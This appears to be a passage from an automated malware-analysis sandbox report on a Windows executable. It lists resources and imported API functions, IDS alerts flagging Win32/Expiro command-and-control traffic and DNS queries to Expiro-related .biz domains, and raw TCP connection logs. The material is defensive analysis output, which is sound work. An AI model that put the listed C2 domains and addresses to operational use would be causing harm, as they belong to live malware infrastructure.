                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4660480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4661980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4662e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4664380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4666d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4669780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x466ac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x466c180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f2980x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fa880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f3f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f9380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f7e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3301180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f6980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fd280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32f5480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fbd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32fe780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x32ffc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3302680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3303b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x3305080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x2f59000x22dataEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4670780x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4674b00x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x4697080x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x469cf80x22dataEnglishUnited States1.1176470588235294
                                                                                                                                                                                                                                                                                                                                                                                        RT_VERSION0x32eda80x2fcdataEnglishUnited States0.4698952879581152
                                                                                                                                                                                                                                                                                                                                                                                        RT_MANIFEST0x46d9f80x4d7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1179), with CRLF line terminatorsEnglishUnited States0.47699757869249393
                                                                                                                                                                                                                                                                                                                                                                                        None0x466c300x1cdataEnglishUnited States1.2857142857142858
                                                                                                                                                                                                                                                                                                                                                                                        None0x466c500x18dataEnglishUnited States1.2916666666666667
DLL | Import
KERNEL32.dll | GetStringTypeW, WriteConsoleW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, InitializeSListHead, ExitProcess, GetStdHandle, GetFileType, SetStdHandle, HeapQueryInformation, QueryPerformanceFrequency, VirtualQuery, VirtualAlloc, GetCommandLineA, FreeLibraryAndExitThread, ExitThread, CreateThread, CreateDirectoryW, RtlPcToFileHeader, RtlUnwindEx, OutputDebugStringW, LCMapStringW, GetCPInfo, GetStartupInfoW, GetSystemTimeAsFileTime, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WaitForSingleObjectEx, ResetEvent, GetUserDefaultLCID, GetTempFileNameW, FindResourceExW, SystemTimeToTzSpecificLocalTime, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FileTimeToLocalFileTime, SetErrorMode, SearchPathW, GetProfileIntW, GetTempPathW, VirtualProtect, GlobalGetAtomNameW, GetThreadLocale, lstrcmpiW, IsDebuggerPresent, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, GlobalFlags, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GetCurrentDirectoryW, GetFileSize, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, CompareStringW, GlobalFindAtomW, EncodePointer, CopyFileW, MulDiv, GlobalSize, lstrcpyW, GlobalFree, GlobalUnlock, FreeResource, GlobalAddAtomW, GetCurrentProcessId, lstrcmpW, GlobalDeleteAtom, GlobalLock, GlobalAlloc, LoadLibraryExW, GetCurrentThread, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, GetModuleHandleExW, InitializeCriticalSectionAndSpinCount, SetLastError, OutputDebugStringA, ResumeThread, SuspendThread, SetThreadPriority, GetCurrentThreadId, CreateEventW, SetEvent, VerifyVersionInfoW, VerSetConditionMask, LocalFree, FormatMessageW, SearchPathA, GetLocalTime, SetFileAttributesA, GetSystemInfo, lstrcpyA, CreateFileW, lstrlenA, GetModuleFileNameW, WriteFile, SizeofResource, GetFileAttributesW, GetWindowsDirectoryW, GetSystemDirectoryW, CreateProcessW, GetModuleHandleW, FindResourceW, LoadResource, LoadLibraryW, LockResource, GetModuleHandleA, WideCharToMultiByte, GetPrivateProfileStringW, MultiByteToWideChar, GetSystemDefaultLangID, GetPrivateProfileSectionNamesW, GetPrivateProfileIntW, WritePrivateProfileStringW, GetTickCount, Sleep, lstrcmpA, K32EnumProcesses, Process32FirstW, Process32NextW, CreateToolhelp32Snapshot, OpenProcess, GetProcessId, FileTimeToSystemTime, lstrlenW, GetProcessHeap, DeleteCriticalSection, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, LeaveCriticalSection, GetCommandLineW, EnterCriticalSection, HeapFree, FreeLibrary, GetProcAddress, CloseHandle, GetLastError, GetVersionExW, WaitForSingleObject, GetCurrentProcess
                                                                                                                                                                                                                                                                                                                                                                                        USER32.dllMoveWindow, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, SetWindowLongW, EqualRect, CopyRect, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, SetForegroundWindow, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, SetFocus, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, InvalidateRect, UpdateWindow, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, CheckDlgButton, CreateAcceleratorTableW, UnregisterClassW, EnableWindow, IsIconic, GetMenuState, GetMenuStringW, MapDialogRect, SetWindowContextHelpId, UnhookWindowsHookEx, PtInRect, ScreenToClient, ClientToScreen, SetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, SetCursor, ShowOwnedPopups, PostQuitMessage, DrawIconEx, IsRectEmpty, OffsetRect, InflateRect, FillRect, DrawFocusRect, GetSysColorBrush, GetSysColor, MapWindowPoints, RedrawWindow, SetWindowRgn, 
DrawStateW, GetFocus, DrawFrameControl, DrawEdge, RegisterWindowMessageW, SetWindowTextW, IsDialogMessageW, IntersectRect, SetLayeredWindowAttributes, SetRectEmpty, LoadCursorW, SystemParametersInfoW, EnumDisplayMonitors, SetParent, MonitorFromPoint, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DestroyIcon, CallNextHookEx, SetWindowsHookExW, LoadImageW, CopyImage, TrackMouseEvent, IsZoomed, CharUpperW, GetAsyncKeyState, SetCapture, ReleaseCapture, GetClientRect, LoadIconW, DrawIcon, GetSystemMetrics, SendMessageW, PostMessageW, GetDesktopWindow, MessageBoxA, GetWindowTextA, PeekMessageW, DispatchMessageW, RegisterWindowMessageA, GetClassNameA, GetWindow, GetWindowThreadProcessId, GetParent, GetClassNameW, FindWindowW, EnumWindows, GetDlgCtrlID, IsWindow, ShowWindow, EnumChildWindows, GetWindowRect, SetDlgItemTextW, MessageBoxW, SetWindowPos, wsprintfW, GetMessageW, TranslateMessage, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, GetKeyNameTextW, SubtractRect, RegisterClipboardFormatW, CharUpperBuffW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, FrameRect, LoadAcceleratorsW, IsClipboardFormatAvailable, PostThreadMessageW, IsCharLowerW, MapVirtualKeyExW, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, GetComboBoxInfo, CreateMenu, DestroyCursor, GetWindowRgn, HideCaret, InvertRect, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, UpdateLayeredWindow, SendDlgItemMessageA, WaitMessage, RealChildWindowFromPoint, GetUpdateRect, SetClassLongPtrW, DestroyAcceleratorTable, ModifyMenuW, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CopyIcon, GetIconInfo, GetDoubleClickTime, EnableScrollBar, DestroyMenu, SetTimer, KillTimer, LoadMenuW, GetSystemMenu, DeleteMenu, MessageBeep, WindowFromPoint, NotifyWinEvent, SetCursorPos, SetRect, UnionRect, BringWindowToTop, CreatePopupMenu, 
LockWindowUpdate
                                                                                                                                                                                                                                                                                                                                                                                        GDI32.dllPtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextColor, SetTextAlign, GetObjectW, MoveToEx, TextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetMapMode, LineTo, DPtoLP, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, RealizePalette, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateRoundRectRgn, Rectangle, GetRgnBox, OffsetRgn, RoundRect, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetViewportOrgEx, LPtoDP, GetWindowOrgEx, SetPixelV, GetTextFaceW, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteObject, CreatePatternBrush, CreatePen, CreateCompatibleDC, CreateBitmap, BitBlt, GetDeviceCaps, CreateDCW, CopyMetaFileW, GetTextMetricsW, Polyline, Polygon, CreatePolygonRgn, ExtTextOutW, PatBlt, GetTextExtentPoint32W, GetTextColor, GetBkColor, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreateHatchBrush, CreateEllipticRgn, CombineRgn, SetRectRgn, Ellipse, DeleteDC
                                                                                                                                                                                                                                                                                                                                                                                        MSIMG32.dllTransparentBlt, AlphaBlend
                                                                                                                                                                                                                                                                                                                                                                                        WINSPOOL.DRVDocumentPropertiesW, OpenPrinterW, ClosePrinter
                                                                                                                                                                                                                                                                                                                                                                                        ADVAPI32.dllRegQueryInfoKeyW, OpenProcessToken, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW, SetTokenInformation, AllocateAndInitializeSid, GetLengthSid, DuplicateTokenEx, RegCloseKey, RegQueryValueExA, RegSetValueExW, RegQueryInfoKeyA, RegOpenKeyExA, RegQueryValueExW, RegEnumKeyExA, LookupPrivilegeValueW, InitiateSystemShutdownW, AdjustTokenPrivileges
                                                                                                                                                                                                                                                                                                                                                                                        SHELL32.dllShellExecuteExW, SHFileOperationA, SHGetSpecialFolderPathW, DragFinish, DragQueryFileW, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHGetDesktopFolder, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc
                                                                                                                                                                                                                                                                                                                                                                                        COMCTL32.dllInitCommonControlsEx
                                                                                                                                                                                                                                                                                                                                                                                        SHLWAPI.dllPathFindExtensionW, PathFindFileNameW, PathRemoveFileSpecW, PathIsUNCW, StrFormatKBSizeW, PathStripToRootW, PathFileExistsW
                                                                                                                                                                                                                                                                                                                                                                                        UxTheme.dllDrawThemeBackground, GetThemeColor, GetCurrentThemeName, IsAppThemed, CloseThemeData, DrawThemeText, GetWindowTheme, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, OpenThemeData, DrawThemeParentBackground
                                                                                                                                                                                                                                                                                                                                                                                        ole32.dllIsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleUninitialize, CoFreeUnusedLibraries, OleLockRunning, RevokeDragDrop, RegisterDragDrop, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, CoLockObjectExternal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoDisconnectObject, CreateStreamOnHGlobal, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoCreateGuid, CLSIDFromString, CoInitializeEx, CoUninitialize, CoRevokeClassObject, CoRegisterMessageFilter, OleInitialize
                                                                                                                                                                                                                                                                                                                                                                                        OLEAUT32.dllSysFreeString, SysAllocStringLen, VariantInit, VariantClear, VariantChangeType, SysAllocString, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, SysStringLen, LoadTypeLib, OleCreateFontIndirect, VarBstrFromDate, VariantCopy
                                                                                                                                                                                                                                                                                                                                                                                        oledlg.dllOleUIBusyW
                                                                                                                                                                                                                                                                                                                                                                                        gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0
                                                                                                                                                                                                                                                                                                                                                                                        SETUPAPI.dllCM_Reenumerate_DevNode_Ex, CM_Locate_DevNode_ExW, SetupDiEnumDeviceInfo, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupCloseInfFile, SetupFindFirstLineA, SetupFindNextLine, SetupGetMultiSzFieldA, SetupOpenInfFileW, SetupGetStringFieldA, SetupDiDestroyDeviceInfoList
                                                                                                                                                                                                                                                                                                                                                                                        USERENV.dllCreateEnvironmentBlock
                                                                                                                                                                                                                                                                                                                                                                                        newdev.dllUpdateDriverForPlugAndPlayDevicesW
                                                                                                                                                                                                                                                                                                                                                                                        OLEACC.dllCreateStdAccessibleObject, LresultFromObject, AccessibleObjectFromWindow
                                                                                                                                                                                                                                                                                                                                                                                        IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                                                                                                                                                                                                                                                                                                                                        WINMM.dllPlaySoundW
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-28T16:37:06.202513+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.4 | 49732 | TCP |
| 2024-10-28T16:37:06.202513+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.4 | 49732 | TCP |
| 2024-10-28T16:37:07.754028+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.4 | 49733 | 18.141.10.107 | 80 | TCP |
| 2024-10-28T16:37:07.760195+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP |
| 2024-10-28T16:37:07.760195+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP |
| 2024-10-28T16:37:10.047679+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.4 | 49738 | TCP |
| 2024-10-28T16:37:10.047679+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.4 | 49738 | TCP |
| 2024-10-28T16:37:10.083474+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.4 | 53248 | 1.1.1.1 | 53 | UDP |
| 2024-10-28T16:37:11.575918+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.4 | 58296 | 1.1.1.1 | 53 | UDP |
| 2024-10-28T16:37:35.211531+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.4 | 49752 | TCP |
| 2024-10-28T16:37:35.211531+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.4 | 49752 | TCP |
| 2024-10-28T16:37:36.856537+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.4 | 49753 | TCP |
| 2024-10-28T16:37:36.856537+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.4 | 49753 | TCP |
| 2024-10-28T16:37:42.766102+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.4 | 49759 | TCP |
| 2024-10-28T16:37:42.766102+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.4 | 49759 | TCP |
| 2024-10-28T16:37:49.539296+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.4 | 49764 | TCP |
| 2024-10-28T16:37:49.539296+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.4 | 49764 | TCP |
| 2024-10-28T16:37:50.475191+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.4 | 49765 | TCP |
| 2024-10-28T16:37:50.475191+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.4 | 49765 | TCP |
| 2024-10-28T16:38:02.711736+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.246.231.120 | 80 | 192.168.2.4 | 49787 | TCP |
| 2024-10-28T16:38:02.711736+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.246.231.120 | 80 | 192.168.2.4 | 49787 | TCP |
| 2024-10-28T16:38:08.321137+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.4 | 49824 | 34.211.97.45 | 80 | TCP |
| 2024-10-28T16:38:13.503761+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.211.97.45 | 80 | 192.168.2.4 | 49850 | TCP |
| 2024-10-28T16:38:13.503761+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.211.97.45 | 80 | 192.168.2.4 | 49850 | TCP |
| 2024-10-28T16:38:17.064873+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.254.94.185 | 80 | 192.168.2.4 | 49873 | TCP |
| 2024-10-28T16:38:17.064873+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.254.94.185 | 80 | 192.168.2.4 | 49873 | TCP |
| 2024-10-28T16:38:27.780922+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.4 | 49935 | TCP |
| 2024-10-28T16:38:27.780922+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.4 | 49935 | TCP |
| 2024-10-28T16:38:36.094787+0100 | 2051651 | ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) | 1 | 192.168.2.4 | 60487 | 1.1.1.1 | 53 | UDP |
| 2024-10-28T16:39:02.026892+0100 | 2051653 | ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) | 1 | 192.168.2.4 | 53838 | 1.1.1.1 | 53 | UDP |
| 2024-10-28T16:39:08.047629+0100 | 2051654 | ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) | 1 | 192.168.2.4 | 50839 | 1.1.1.1 | 53 | UDP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.871558905 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.932224035 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937676907 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937784910 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937984943 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.938003063 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.943411112 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.943444967 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.340797901 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.369271994 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.374705076 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.374806881 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.380485058 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.380496979 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.040299892 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.041393995 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.047678947 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.047817945 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.137711048 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.143078089 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.143832922 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144428015 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144540071 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.149957895 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.149970055 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.804972887 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.805335999 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.805335999 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.810703993 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.834805965 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840244055 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840327024 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET4974080192.168.2.4172.234.222.143
